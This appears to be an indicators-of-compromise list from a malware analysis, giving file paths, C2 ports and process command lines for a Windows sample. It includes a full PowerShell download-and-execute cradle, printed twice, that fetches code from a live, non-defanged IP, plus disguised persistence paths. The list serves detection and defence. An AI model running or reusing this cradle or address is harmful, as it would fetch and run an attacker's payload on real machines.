Technical Information (indicators observed: URLs, file paths, network endpoints and process command lines; some IP addresses are partially defanged with `#`)
- http://222.186.141.207:8895/r29ktg9hza== (case-folded rendering of the `R29kTG9hZA==` path listed below; base64 is case-sensitive, so match on the original-case form)
- %WINDIR%\syswow64\svchost.exe
- %ALLUSERSPROFILE%\ini\windows up.exe
- <Current directory>\psyqrdcd.dll
- '22#.#86.141.207':8896
- '22#.#86.141.207':8895
- http://22#.###.141.207:8895/R29kTG9hZA== via 22#.#86.141.207
- '22#.#86.141.207':8896
- '22#.#86.141.207':8895
- '%ALLUSERSPROFILE%\ini\windows up.exe'
- '%ALLUSERSPROFILE%\ini\windows up.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://222.186.141.207:8895/R29kTG9hZA=='))" (with hidden window; PowerShell download-and-execute cradle: `-nop` skips the profile, `-w hidden` hides the console, `IEX` runs the string fetched from the URL)
- '%WINDIR%\syswow64\svchost.exe' -Puppet (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://222.186.141.207:8895/R29kTG9hZA=='))"
- '%WINDIR%\syswow64\svchost.exe' -Puppet